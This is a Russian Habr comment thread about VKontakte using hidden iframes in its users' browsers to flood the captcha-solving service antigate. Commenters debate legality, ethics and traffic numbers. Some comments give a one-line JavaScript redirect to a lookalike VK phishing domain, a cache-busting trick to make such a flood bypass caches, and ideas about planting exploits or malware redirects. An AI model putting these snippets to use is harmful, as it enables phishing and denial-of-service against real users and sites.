Information Security
Comments 659
+1
Вы сейчас еще к этому и хабраэффект добавили. Капля в море, которая может стать последней.
+47
Да, все на хабре тут же прошли по ссылке посмотреть а что же там такое :) Интересно было бы, если антигейт поставит редирект на login.vk.com/?act=logout для выбрасывания пользователей, как долго они боролись?
0
Вроде защита браузера должна сработать и не дать такое сделать.
0
помню ходил на ресурс, который через айфреймы и автосабмит отсылал сообщение автору сайта. (Сообщение действительно отсылалось).
Прикол в том, что в IE этот фокус не работал, там уже защита была. Это были времена 7-го ИЕ.
+13
Вообще зря они так, туда можно было бы и обратный ддос загнать, и эксплоит запилить, и тупо редирект на вирь сделать, а Дурову потом за всё это отдуваться =)
+5
Да, причем для наблюдателей с IP-адресами подсетей ВКонтакта скромно выдавать 500-ю ошибку, чтобы они подольше упивались своей крутостью и сообразительностью.
+2
Мне кажется, там все таки сидела специальная обезьянка проверяющая правильно ли работает iframe =)
+10
Обезьянка зевнуть не успеет, как десятки тысяч пользователей словят вредоносный фрейм =)
Кстати, вот что действительно стоило сделать антигейту — это редирект на фишинговую страницу ВК (или фреймом), думаю Дуров потом бы сгорел со стыда с заголовков новостей =)
0
О да.

As simple as:

<script type="text/javascript">top.location.href = "http://vk.com.auth.login.user.vkloginuser.com/";</script>
0
А я вот получил сегодня на страничке такое сообщение, — мол яндекс стал вредоносным

image
+52
Надо было цеплять iframe-ом любую страницу вконтактика. Которая рекурсивно подключала бы антигейт, который бы опять подключал вконтактик, пока браузер не выбъет.
С точки зрения хомячка вконтактик бы перестал открываться, о чем уже через полчаса трубили бы во всех сми. Еще чуть позже выяснилось бы, что вконтактик заДДОСил сам себя xD
+3
Скорее всего не вышло бы — у контакта, вроде как, есть скрипт, который определяет, что он открыт во фрейме.
0
Тоже вариант — открывается вконтактик, а там постоянно страница перезагружается. Ломать не строить.
0
Не, оно просто не работает. Не открывается нормально. Ща потестил в айфрейме.
0
Да, но эта защита заключается в том, что не открывается ничего.
UFO landed and left these words here
-11
Ребят, упомянутый антигейт это компания для взламывания капч.
Я не люблю вконтакт, но по отношению к спамерами фраза «не люблю» подходит плохо.

Поэтому, если кто не поддержал проект antigate.com — заходите, не стесняйтесь! Почитайте что они пишут о себе, чем они занимаются — на русском языке все написано.

Скорее всего, вам захочется нажать f5 ещё и ещё. Я лично просто не могу остановиться.
-1
Лично они ничем таким противозаконным не занимаются, так что вы боритесь не с теми людьми. Люди, спамящие и использующие антигейт(или другой сервис распознания, коих десятки) находятся совсем другом месте
+31
Вы можете навскидку назвать хоть один способ легального использования ресурса антигейт?
+2
Распознавание за свой счет номеров домов из StreetView, которые Google подставляет в рекапчу.
+2
МУХАХА, как вы себе это представляете?
Сидит человек — вырезает кусок с картинки и отсылает антигейту на проверку? Почему бы этому человеку сразу руками номер не выписать дешевле и быстрее получится? =))
+2
Google сейчас автоматически вырезает эти цифры и некоторые из них становятся основой для рекапчи, используя тем самым, бесплатную рабочую силу для развития своего сервиса.
+1
Способы использования — это совсем другое. С помощью большинства бытовых предметов можно совершить очень тяжкие преступления. В самом сервисе распознания картинок — нет ничего противозаконного.
+8
Ну это же не бытовые предметы, а узкоспециализированные услуги, всё равно что я сейчас открою контору по обучению «домушников», вроде бы я сам и не буду воровать, но воровству буду активно способствовать.
+1
Ну и что? А вы знаете, что есть «легальные домушники»?
Конторы типа 1000 услуг, которые на-раз вскрывают при вас вашу же дверь.
UFO landed and left these words here
-5
Не подумайте, что я оправдываю антигейт, но:
1) домушники — это спамеры
2) антигейт не спамит, пока обратного не доказано
3) их сервис можно использовать не только для спама

Хотя, чего уж там говорить, значительная часть их пользователей — спамеры, в этом ключе сервис не очень-то этичный.
UFO landed and left these words here
-1
Они принимают на вход некую картинку, с которой нужно распознать некий текст. Не имеют информации ни об источнике картинки, ни об целях распознавания, ни о правилах сайта (если картинка является капчей). Не совершают противоправных действий, а в том что результаты этих действий затем используются противоправно виноваты лишь использующие, разве не так?
+3
Нет, не «некую», у них на сайте написано прямым текстом — «картинку CAPTCHA»
0
И что? Капча — тест на человек/«робот», это не защита от спама. У антигейта распознавание проводя люди вроде как, то есть они делают именно то, для чего капча предназначена. Просто спамеры делегируют функцию распознавания другим людям через посредника (антигейт). Если я попрошу друга, который рядом со мной, распознать капчу, то друг станет преступником. А если по телефону, то и оператор станет? А если незнакомого человека попрошу по телефону?
+7
Капча обладает запрещающим действием, а не просто информирует владельца сайта о том, робот с ним общается или человек.

Я вот одного не могу понять: зачем людям защищать и как-то оправдывать этот нехороший сайт, это равносильно тому что кто-то на улице бьёт окна, а толпа скандирует — «бей ещё!!! бей ещё!!!». Просто поупражняться в софистике?.. Есть много других более увлекательных тем для этого.
Почему-то хорошие проекты и дела с трудом находят поддержку, а вот уж что-нибудь поломать и напакостить, тут желающих хоть отбавляй…

Всем ясно что сайт антигейт занимается очень плохой деятельностью, так же всем понятно что «вконтакте» тоже поступили нехорошо и даже как-то по-детски и оправдывать, ни тех, ни других даже не хочется. Но поддерживать их… что-то происходит не так в этом мире… ((((
+2
Капча как раз информирует (и то зачастую бывают ошибки обоих родов), а решение запрещать доступ или нет принимает владелец.

Неэтичный бизнес не значит нелегальный, а в этом топике бизнес антигейта неоднократно так назвали. Лично я к этому чувствителен. Например, защищаю владельцев торрент-треккеров, считая, что их бизнес (или хобби) могут быть неэтичны, но легальны (если сами ничего не раздают или раздают только легально). А вот пользователи зачастую совершают с помощью торрент-треккеров нелегальные действия.
-2
Ну к торрентам я сам неоднозначно отношусь, мало того считаю это хорошо и что продьюсеры музыкальные и прокатчики фильмов не правы совсем, мир изменился а они хотят грести деньги мешками по старому… Сделали бы как у ММОРПГ игр — канал где можно смотреть лицензионные фильмы или слушать музыку хорошего качества с абонентской платой и были бы опять в большом наваре, но судиться им видимо проще. Про софт тоже самое.

Но к спаму я очень отрицательно отношусь и оправдания их деятельности не вижу. Засоряют каналы, мешают находить информацию в интернете, да и вообще раздражает это. И никакой пользы для окружающих от спама я точно не вижу.
-1
Я, например, не вижу ничего плохого в том, чтобы например
Есть одно заведеньице, в коророе попасть на прием можно только по записи. Запись — через сайт с капчей. Даты записи выбрасываются рандомно раз в неделю (примерно). Чтобы увидеть, что мест нет — нужно пройти капчу. Это с ума сойти можно — сидет и беспрестанно тыкаться в ожидании.

автоматизировать эту задачу.

И спорю я как раз например с тем, что сайт этот не бьет никаких окон, и ваша аналогия неуместна. Также как и деятельность его можно направить как в плохое русло, так и в хорошее — это выбор только пользователя, не сервиса.
-1
Можно написать вебмастеру и подобную проблему могут решить. По крайней мере все предложения юзеров написанные по поводу моих сайтов, я всегда с заказчиками обсуждаю и часто подобного рода неудобства исправляем.
0
Этот сайт способствует распространению спама, я не вижу смысла поддерживать его в связи с этим. Для распознавания текста есть специализированные программные продукты и платные и бесплатные.
0
Так никто вроде и не поддерживает его в связи с этим, разве нет?

Косвенно помогает — возможно да. Но ведь тогда выходит, что поисковик способствует взлому сайтов, ВК — «пиратству», а ученые, оружейники и продавцы — убийствам и грабежам?

Да, продукты есть, и пользовать их или антигейт — выбор каждого. И да, тогда выходит, что эти специализированные продукты тоже способствуют распространению спама?
+1
Однако возможно косвенно помогают спаму (не зная об этом, кстати, а предполагая — вы можете точно сказать, что вот эта вот картинка с кодом будет использована для рассылки спама?), а не способствуют — они же не заставляют вас использовать их сервис для спама, верно?
0
Это единственная цель сайта у них это написано на главной странице.

Основная цель поисковиков — находить информацию, а побочно они помогают находить уязвимости (опять же, по недосмотру веб-мастеров).
А тут цель сайта однозначна — взламывать капчи. Потому я откровенно не понимаю зачем люди это защищают.
+1
Капчи не взламывают, их распознают, а взламывают с помощью распознавания капчи системы защиты от нежелательных пользователей. Но антигейт этим взломом не занимается, хотя, думаю, им не составило бы труда открыть, например, сервис массовой регистрации аккаунтов в том же вконтакте, или массового постинга в нём же. Грань закона они, имхо, не пересекают.
+3
Я не говорю о незаконности чего либо, я говорю о том что эти люди делают зло, а другие их защищают и это по сути тоже очень нехорошо.
+1
Цель сайта — распознавание капчей, да, у них это написано на главной, а вы видите здесь слово «спам»? Ни слова о спаме.
Как было показано, распознавание капчей применяется далеко не только в целях рассылки спама, и опять же, рассылают пользователи, не сервис по распознаванию капчей, не так ли?

Так здесь также: основная цель — распознавать капчи, а уже побочно рапознанные капчи пользователями могут быть использованы для спама. Давайте же обвиним «спец. продукты» в спаме, или ученых в войнах?

Повторюсь в третий раз: я защищаю от неверных с моей точки зрения обвинений в адрес этого сервиса.
-1
Тут просто половина народу антигейт использует/использовала в тех или иных целях.
UFO landed and left these words here
0
Паразитирует не верное слово. Симбиоз, взаимовыгодное сотрудничество. Паразитируют спамеры.

Да, бизнес, антигейта неэтичен, но не вижу причин считать его нелегальным. А вот насчёт ДДоС есть сомнения, то есть есть однозначно нелегальные случаи, а есть вполне, имхо, легальные, скажем, «социальный ДДоС», сознательный хабраэффект. А вот действия вконтакта близки к первому.
+1
>>>Мы так вокруг долго ходить может. Более того, можно и ДДОС представить совершенно легальным.
Так ДДОС и есть совершенно нелегальный.
UFO landed and left these words here
0
В случае с квартирой у вас есть способ подтверждения владения этой квартирой; способа подтверждения того, что вы распознаете капчу с сайта, где это разрешено правилами или со своего — не наблюдается.
UFO landed and left these words here
0
Как минимум тем, что «Незаконное проникновение в жилище, совершенное против воли проживающего в нем лица, — наказывается...», т.е. наказание наступает за незаконное проникновение в любое жилище. И еще: заметьте, наказание наступает за проникновение, не за взлом замка. Есть еще «умышленные уничтожение или повреждение чужого имущества», однако каковы повреждения при распознавании капчи просто другим человеком, а не вами? Вообще, какая разница, что капчу распознаете не вы, а другой человек?
Здесь скорее больше подходит: вы подводите меня к неизвестной двери, показываете замок, а я говорю вам фирму-изготовителя, модель, и как его взломать, а далее удаляюсь. Чувствуете разницу?

Еще контрпример: следователю при расследовании убийства кого ценнее найти, и кого следователь более стремится найти — киллера или заказчика?
UFO landed and left these words here
0
ну если о суда дойдет, то будут судить за проникновение в группе. И без разницы что вы взломали дверь и на улице стояли.

Допустим, что вы правы.

Да, но пример не правильный — вас подводят к кодовому замку, вы в нем копошитесь, а потом называете код доступа.

Копошение замка подразумевает взаимодействие с замком, тут уже небось и «умышленные уничтожение или повреждение чужого имущества» есть. Здесь же не так — вы сами «стягиваете» капчу с сайта (взаимодействуете, копошитесь с замком), отдаете ее _копию_ сервису (копируете замок), сервис вам называет текст (код замка, причем уже даже не именно того, что был на сейфе).

Плюс — не видел сайтов, где правилами (как законами) запрещено распознавание капчи другим человеком.
UFO landed and left these words here
0
Соучастники нарушения правил сайтов? Нарушает тот, кто регистрируется с помощью софта (и это, имхо, не преступление, чтобы говорить о соучастии). Антигейт с сайтами вообще никак не связан, на них не заходит, правил их не принимает, он лишь предоставляет сервис для помощи прохождения теста человек-«робот», причём путём его нормального использования — распознают-то люди, тест свою задачу выполняет.
+1
А кто использует софт для регистрации? Антигейт или спамеры?

Однако правилами сайта соучастие такого рода (распознавание капчи другим человеком) каким образом наказывается, запрещается, пресекается и как определяется, покажите?
0
Ага. А я написал плагин к хрому, который автоматизирует регистрацию.
Гугл — участник нарушения правил. Давайте его тоже задосим.
И, кроме того, даже нарушение правил сайта еще не является само по себе незаконным.
За накрутку кармы на хабре забанят. Но в суд идти будет бессмысленно.
UFO landed and left these words here
0
Ха! Есть один более-менее легальный вариант разбора капчи — тренировка/тестирование OCR-алгоритмов. Типа одна и таже картинка рапознается OCR и человеком и сравнивается результат.
Но это не про антигейт, скорее всего.
0
Есть придираться, то никаких капч антигейт не взламывает. Он с помощью своих «сотрудников» распознает буквы с картинок. Откуда эти картинки ему дела никакого нет.
0
Вроде как и дверь «привезли» к нему, а все равно не законно.

Покажите сайт, где правилами запрещено распознавание капчи другим человеком.
0
Я бы сказал, что практически любой «взлом капчи» (распознавание картинки) легален, особенно используемый антигейтом (распознавание людьми) — тут даже смысл теста не нарушается, распознаёт картинку не компьютер, а живой человек.

И даже автоматическая регистрация легальна — она нарушает правила сайта (договор по сути), но не закон. Даже автоматический постинг сообщений легален, если сообщения сами по себе легальны, а если не легальны сообщения (или их размещение) — незаконная реклама, нарушение копирайта, разжигание национальной или религиозной вражды, призывы к свержению власти и прочий экстремизм и хулиганство, то суд меньше всего будет волновать пользовался преступник программой или ручками капчу вбивал и ручками же сообщения постил. А легальные взаимоотношения сайта и его пользователей — только их дело, если кто-то не хочет договор выполнять, вторая сторона вправе тоже не выполнять его и вправе потребовать возмещение ущерба (включая пресловутый недополученный доход), но от того кто с ней договор заключал (или производил действия, акцептующую оферту), либо от того, кто нанёс ущерб. В данном случае антигейт сайтам ущерба не наносит, он с ними никак не взаимодействет, правил их не знает, да и сайтов самих не знает, а значит умысла на их нарушение не может иметь даже теоретически.
0
Есть такая детская софтина — называется iSendSMS. Ее задача — отправка бесплатных SMS. Работает она через сайты операторов (точнее через их веб-интерфейсы бесплатной отправки мессаг).

Но так как на таких страницах установлена каптча, перед отправкой сообщения софтина подгружает картинку каптчи и предлагает отправителю распознать ее. Вроде не напрягает, но и лишнее телодвижение иногда напрягает. Вот для таких ленивых людей там есть ф-я автораспознания каптч, которая работает именно через Antigate.

Не думаю, что это абсолютно легально, но уже не похоже на домушников.

З.Ы. Я так же не оправдываю Antigate, просто по вашей просьбе привел пример.
0
Спасибо неадекватам, не поленившим залезть в профиль и слить карму, но поленившимся аргументированно возразить.
0
Когда домушники вскрывают вашу дверь — они вскрывают вашу собственность, чего нельзя сказать о вконтакте.
+1
Я могу. Есть одно заведеньице, в коророе попасть на прием можно только по записи. Запись — через сайт с капчей. Даты записи выбрасываются рандомно раз в неделю (примерно). Чтобы увидеть, что мест нет — нужно пройти капчу. Это с ума сойти можно — сидет и беспрестанно тыкаться в ожидании.
UFO landed and left these words here
+3
Моё время на ввод капчи и присутствие при этом дороже, чем заплатить другим и сделать оповещалку себе. Покажите правил сайта где будет написано «вы должны сами вводить капчу».
0
Даже если я нарушаю правила (закон не нарушаю), то это касается только меня и сайта. Третьи лица, к которым я обратился за помощью для нарушения правил, здесь непричём, если они сами с сайтом не взаимодействовали. Максимум владелец сайта может их на своем сайте забанить.
0
Смотрите какая штука — мест ограниченное количество. Нельзя «массово зарегистрироваться». Абсолютно во всех случаях срабатывает правило — кто превый встал, того и тапки. Только теперь — с капчей.
0
Без капчи смогут боты, написанные любым школьником регистрироваться, просто для прикола. Бот быстрее «встанет».
+1
Ну так и вы бота напишите. Или заплатите кому-нибудь. В конце концов для этого и созданы компьютеры — экономить время человека.
0
Лично я бы им заплатит 10 баксов, за 100 капч, чтобы они ее вместо меня решали)
Надоело эту дурь вводить.
+1
Я могу навскидку назвать три способа легального использования сервисов антикапчи:
1. Распознавание номеров домов
2. Распознавание автомобильных номеров
3. Распознавание отсканированных и нераспознанных кусков текста из книг, рукописных писем, документов…

Да, и никто не мешает использовать вместо лежащего антигейта аналог типа пиксодрома (он же anti-captcha.net)
0
Парсинг wordstat.yandex.ru для планирования SEO-компании. Яндекс не одобряэ, но ничего нелегального тут нет.
+5
Чем спам (нежелательная рассылка) отличается от ddos (незваный трафик, только забивающий ресурсы) с точки зрения вашей любви и не любви?
Или кровь не грех, если из вен чужих?
0
Ну например наша компания использует антигейт, чтобы собирать ключи для семантического ядра. Не нужно видеть только 1 применение какого то сервиса.
+9
И как, сборка ключей не запрещена TOS поисковой системы, которую вы используете?
0
Для крупных компаний, спор ключей из вордстата разрешен по документам. Если у компании есть сертификат работы с Яндекс.Дерект он может собирать ключи для сематического ядра, но безлимитных доступов они же не дают, система бани сама по себе. По этому мы честно собираем ключи используя Антигейт и все документы и разрешения у нас есть. Вы просто представьте сколько хвостов нужно собрать, для конкурентной тематики :)
+118
Круто, это означает что Вконтакте использует трафик своих пользователей в незаконных целях?
+1
Статья 272 УК РФ. Неправомерный доступ к компьютерной информации

1. Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, — наказывается штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет.

2. То же деяние, совершенное группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их сети, — наказывается штрафом в размере от пятисот до восьмисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от пяти до восьми месяцев, либо исправительными работами на срок от одного года до двух лет, либо арестом на срок от трех до шести месяцев, либо лишением свободы на срок до пяти лет.
+8
А где здесь неправомверный доступ и к какой информации?
+3
Где-то здесь:
«если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети»
+10
Не выкидывайте слов из песни — эта часть следует из первой в том случае, если неправомерный доступ к информации был осуществлён.

Посему, повторяю свой вопрос: к какой информации был осуществлён неправомерный доступ?
-8
К информации на атакуемом ресурсе… это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации,
+8
Ключевая фраза «Неправомерный доступ к охраняемой законом компьютерной информации», я не юрист, но по моему то что сейчас происходит не совсем подходит по это определение.
+3
разве то, что у меня сайт начал выдавать 503 не подпадает под «блокирование информации»?
+3
Ресурс добровольно выложил информацию в публичный доступ. Как доступ к ней может быть неправомерным?
+2
Правомерным ли является намеренное создание ситуации при которой ресурс не способен отдавать информацию?
+3
Не знаю.

Я лишь обсуждаю вашу цитату. Согласно нормам русского языка и здравой логике — конкретно та статья тут мимо кассы, потому что вы (и комментаторы выше) неправомочный доступ к информации не показали.

Неправомочный — это взлом, нарушение пользовательских соглашений.
0
Я точно так же не юрист, но прецеденты по этой статье за DDoS были, как утверждает всезнающий гугл. Закон как дышло, как повернешь — так и вышло.
Вон ниже нашли, как мне кажется, еще более подходящую статью 273, но к ней тоже можно докопаться.
+2
Зря вы здравую логику используете при чтении законов :)
+3
А нам, обывателям, больше нечем тогда руководствоваться :-) Практики у нас нет, а логика, вроде бы, есть :-)
0
Это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети. DDOS (сайта антигейт) это нарушение систем ЭВМ или их сети сделанное умышленно! Что повлекло блокирование работы их информационных систем (блокирование) в сети интернет.

ст 272 ч.2 УК РФ

+1
Контакт использует своих клиентов для ддос атаки, получается ботнет из более чем 10 миллионов машин. Это правомерно?
+1
Нет, наверное неправомерно. Но статья 272 (которую мы тут и обсуждаем) тут не при делах. И ниже подсказывают правильные номера.
+1
Антигейт не будет судиться с вконтактом, не верю я в это. Как никак, ресурс не шибко законен.
+8
А чем антигейт нарушает закон?
Биржа по разгадыванию капч.
+1
Мммм… Ну скажем, он размещает на своих страницах объявления о продаже инструментов для рассылки спама. Не знаю даже. Прикрутить можно к нему всё что угодно. Была бы фантазия.
0
Ну я ж и говорю. Была бы фантазия. Вконтактик все равно будет белым и пушистым, а антикапча будет всея злом.
0
Так к ВК можно тоже много чего прикрутить :) Даже легче, мне кажется.
+1
Тут дело не в том, кому легче, что прикрутить. А в том у кого больше власти (знакомств, акций на бирже и т.д.). Антикапча чудесный сервис. Но боюсь именно она останется виновата.
+2
Если, предположим, у вас сайт на слабеньком сервачке, и на него выложили ссылку, допустим, с Хабра, в следствие чего ваш сервер накрылся медной вагиной, это неправомерно? Можно ли хабраэффект рассматривать как ддос?

И еще вопрос. Сервис по расшифровке капчи это правомерно?
+8
В упор не понимаю чего может быть неправомерного в расшифровке капчи?
0
Guns Don't Kill People, однако в России купить проблема, а в США в целом свободная продажа. Кто прав?
+5
Axes Don't Kill People. Кстати, в России свободная продажа топоров. И кухонных ножей.
0
Вам бы понравилось если бы у вас под домом изготавливали отмычки почти для любых замков?
0
Вы говорите это так, как будто сейчас достать отмычки проблема. Вариантов масса, от заказа у профессиональных токарей до покупки набора за десять баксов на дилэкстриме.
-1
Ответьте, пожалуйста, на поставленный вопрос. Лично вы бы были довольны от соседства с таким замечательным бизнесом?
+3
Скорее да, мне однажды приходилось покупать отмычки, и если возникнет такое желание в будущем и не надо будет далеко ходить, это несомненный плюс.
+3
Нет, не может, знаете почему? Если я вижу ссылку на хабре, я _сам_ принимаю решение перейти туда, а в данном случае меня никто не спрашивал хочу ли я или нет.
0
Но если при этом ссылка была сопровождена текстом: «Посоны давайте задудосим их», то вы станете соучастником преступления? :)
+1
Нет, не стану, я просто зашел на сайт, по своей воле зашел чтоб посмотреть что там и как, это не значит что я собираюсь сделать что-то плохое. Но когда мной пользуются чтоб сделать что-то плохое, мне не нравится это.
UFO landed and left these words here
+1
Это называется монетизация, хабр зарабатывает и я об этом прекрасно знаю.
Для тех кто в танке я даже скажу больше, администрация хабра писала топик о том что будут вводиться рекламные банеры и сколько их и где они будут.
Вы просто потроллить решили или действительно не понимаете разницу когда _я знаю_ о том что мне показывают банеры, я _решаю_ нажать ссылку или нет, и тем когда я в неведении что меня используют как часть ботнета потому что им эти люди не нравятся?
UFO landed and left these words here
0
Честно? Мне срать, пусть борятся, но без меня, я бы не возникал так, если бы они сообщили что будут это делать, возможно даже поддержал бы, если бы банально попросили помочь.
UFO landed and left these words here
0
Да вот не так это легко =) Это как аську забросить, есть люди которые переодически нужны, и которые торчат только там (я про музыкальный контент вообще молчу).
Да и крики все это не потому что контакт решил бороться с распознавателями капчи (что в принципе не плохо по сути) а потому что он относится к своим пользователям как к стаду баранов на которых можно положить большой хер, и который можно кинуть (да в этом фрейме могли подсунуть трояна) при псевдо криках о внимании к безопасности итд.
UFO landed and left these words here
UFO landed and left these words here
+2
Что-то мне подсказывает, что эти же статьи можно применить к antigate.com
+11
Тут другая статья должна применяться (особенно учитывая какой опасности подвергают пользователей):

Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ

1. Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами — наказываются лишением свободы на срок до трех лет со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
2. Те же деяния, повлекшие по неосторожности тяжкие последствия, — наказываются лишением свободы на срок до семи лет.
0
Именно.
272 — нарушение с НСД
274 — нарушение, связанное с доступной информацией.
+6
Минус мне, видимо, поставил сам Дуров. Так как DDoS всегда шел по этой статье.
Статья 274. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети
1. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети лицом, имеющим доступ к ЭВМ, системе ЭВМ или их сети, повлекшее уничтожение, блокирование или модификацию охраняемой законом информации ЭВМ, если это деяние причинило существенный вред, -
0
Кстати, данное нарушение возникает самом собой или его нужно инициализировать методом подачи в суд? (где на подающего аналогичную бодягу натянут)
UFO landed and left these words here
+16
Владельцы ботнетов, срочно свяжитесь с владельцем antigate, думаю он сможет продавть вам тонны iframe трафика для загрузок

Кстати да. Они подвергают риску своих пользователей, ведь достаточно по тому адресу положить эксплоит, и привет новым ботам.
+1
Забавно, рейтинг комментария перевалил за сотню, а карма — тю-тю.
+2
Точно, контакт ддосит тех, кто помогает спамить и не только на нем, ай-ай-ай
+33
Мне все равно кого они там ддосят. Важно то, что они используют мой канал.
+10
Точно, когда социальная сеть берет себе права суда и прокуратуры — всё ок.
Предлагаю админам контакта начать расстрелы тех, кто спамит.
0
Если канал не забьют, то отбиться от такой чепухи не сложно.
+9
Если ВСЕ пользователи ВК ломанутся туда — они забьют десятигигабитный канал запросто. А больше 10 ГБит много ли у кого сейчас есть?

Ваш диванный теоретик.
+1
Посчитайте там у себя на диване, сколько у ВКонтакта должно быть пользователей, чтобы запросто забить 10Gbit запросами на получение страницы. :)
-1
И что будет удерживать эти соединения? От пользователя через iframe уходит запрос на получение страницы, сервер отправляет ответ «идите лесом», соединение закрывается.
+4
Это теоретически так все просто, но когда к вам идут десятки соединений одновременно, сервер тупо не успевает даже говорить «идите лесом», а вместо этого говорит «погодите, я занят» выдавая пятисотые ошибки.
0
Вы наверное не заметили, но в этом треде были как-раз чисто теоретические рассуждения.
0
nginx.conf:
location blablabla {
return 444;
}


И он тупо рвет соединение, даже не отсылая корректных заголовков браузеру.
И судя по тому что antigate всё еще жив и даже редиректил пользователей на порнуху у них с каналом и нагрузкой всё ок :)
+3
nginx, к примеру, может посылать лесом десятки тысяч соединений в секунду.
+1
Что, все пользователи ломанутся в одну и ту же секунду? Не смешите.
0
Хитов в контакте много, если пользователей десятки миллионов.
+1
Ещё раз: речь о количестве соединений в секунду.
Чтобы получить десятки миллионов соединений в секунду, нужно, чтобы десятки миллионов пользователей вконтакта ломанулись одновременно, в одну и ту же секунду.
0
Страничка — 10кбит (примерно). Получаем, что нужен миллион запросов в секунду.
С учетом того, что почти все страницы у контакта аяксовые и onbodyresize вызывается только при заходе извне… да, не хватит:)
А вот если бы они сделали по запросу в секунду — то явно хватило бы.
0
ОК, я немножко помогу диванному теоретику. :)

Если вести речь о забивании канала, нужно исходить из:
1) Среднестатистического количества обращений (в секунду);
2) Объема информации, который при этом передается на сервер и от сервера.

Если исходить из того, что при одном соединении передается 1 килобайт информации (да, грубое допущение, но порядок где-то такой), то для забивания 10Gbit необходимо обеспечить 10 000 000 000 бит/сек / ≈ 8 000 бит = 1 250 000 подключений в секунду.

А теперь попробуем прикинуть размеры аудитории, которая бы генерировала такую нагрузку через iframe своего любимого ресурса. Опять-же, очень грубо допустим, что в среднем каждый пользователь обновляет страницы ресурса 100 раз в сутки (думаю, этот показатель сильно завышен, но мы просто рассуждаем, ОК?). В сутках 86400 сек., так что в среднем получается одно обновление в 864 секунды.

Итоговая цифра гипотетических размеров аудитории: 1 250 000 * 864 = 10 800 000 000 человек. Т.е. полтора размера человеческой популяции. :)
+1
iframe можно генерировать динамически, что даст существенно больше 100 запросов в сутки.
+1
Вы забыли учесть, что функция подгружающая iframe повторяла запрос раз в секунду. Так что каждый пользователь в сутки сделает 86400, если не закроет страницу.
+1
Можете стряхивать пепел. Раз в секунду оно не посылает. setTimeout() выполняется всего один раз, в отличие от setInterval(). setTimeout() добавили видимо чтобы сам вконтакт прогрузился прежде чем открывать антигейт.
+7
Кстати, вроде неплохой вопрос для собеседования.

Вместо ерунды типа «За сколько времени вы могли бы помыть все окна в с Сиэтле» можно спросить «Каким должен быть размер аудитории ВКонтакта, чтобы эта богомерзкая социальная сеть могла забивать 10-гигабитные каналы просто встроив в код своих страниц iframe с адресом неугодного им ресурса?». :)
+54
Давайте не будем придумывать стойкие капчи, а просто заддосим тех, кто нам мешает. У нас же самый большой в России бесплатный ботнет.
+15
При чем тут стойкие капчи, если их как раз люди и распознают?
+3
Любые конкурирующие или как-то мешающие сервисы создаются людьми, но это не значит, что нужно тупо ддосить, тем более ддосить втихаря используя своих пользователей, которые, могут быть несогласны с целями и задачами владельцев сервиса.
-2
Распознают их люди, поэтому капчей не решить. Более того распознают люди с разных концов света и т.п., такую фигню ОЧЕНЬ сложно технически сделать так, чтобы и нормальным юзерам было удобно пользоваться. Так что все правильно сделали они, антигейт теперь просто не будет давать распознавать капчи Вк.
+5
Ну да, проще составить список таких сервисов и ддосить втихаря используя своих пользователей, а не решать проблему.
Мне не нравится, что люди могут зайти ко мне в квартиру, но ставить дверь, сигнализацию, видеонаблюдение и т.д. и т.п. я не хочу, это очень сложно технически и неудобно практически. Я просто убью всех людей.
0
Поставьте себе сигнализацию — не разрешайте сайтам открвать ифреймы на сторонние сайты.
0
Внедрите дополнительные и/или иные механизмы вместо капчи для предотвращения того, что вам не нравится.
0
Какая проблема? Вы читаете, что вам пишут??? Какую супермегастойкую капчу не придумай, она будет «взломана», так как её вводят ЛЮДИ!
0
Да, я читаю то, что мне пишут. Я не предлагаю ограничиваться только сложностью «рисунка» капчи, ведь это не единственное свойство капчи? Есть, например, ип, с которого она тянется. Уже два свойства, которые можно коррелировать. Есть статистика по пользователям, их активности, тексту и т.д. тп. и др. и пр.
Но нам лень, мы будем тупо ддосить.
-1
Достаточно сделать это экономически не выгодным. Когда antigate открывался, там было написана стоимость: 1 цент за 10 распознаваний. Если сделать капчи такими, что будет 1 цент за 100 распознаваний, то люди распознавать уже точно не будут.

А сейчас получается, то они забивают интернет-каналы всей страны. А от этого страдают не только сайт антикапчи, но и все промежуточные узлы. А представьте ситуацию, если кто-то выходит через мобильный интернет в области, избыточный траф = избыточные платежи, а если у кого-то канал слабый (например, школы в регионах), то это может привести их к отключению от интернета.

И если antigate просто добавит здоровенный файл на тот урл (с разрешением кеширования), то нагрузка в большей степени уйдет на кеширующие сервера, пользователи просто отвалятся.
0
И если antigate просто добавит здоровенный файл на тот урл (с разрешением кеширования), то нагрузка в большей степени уйдет на кеширующие сервера, пользователи просто отвалятся.

… то поможет нападающим забить свой канал. Потому, что вы недооценили число сетей и каналов, через которые эти пользователи заходят. Нет столько централизованных кешей. А уж разкешировать этот ваш большой файлик можно простым добавлением к ссылке
'&rnd='+Math.random();
+7
Судя по описанию с сайта они и так вручную их разбирают. Тут уже остается придумывать только капчи стойкие к распознаванию человеком =))
-5
Или дополнительные механизмы проверки, но не тупо ддосить. DDoS не решит самой проблемы с капчей.
+2
Нет, там ln 2 получается.
PS вот ведь еще какой веселый вопрос — в каком формате вводить подобный ответ? Надеюсь, эта картинка так и останется шуткой.
+2
Ага, тоже посчитал, тут хорошо еще под корнем предел легкий.

Помнятся мне кошечки с собачками у рапиды, шутка тогда удалась.
0
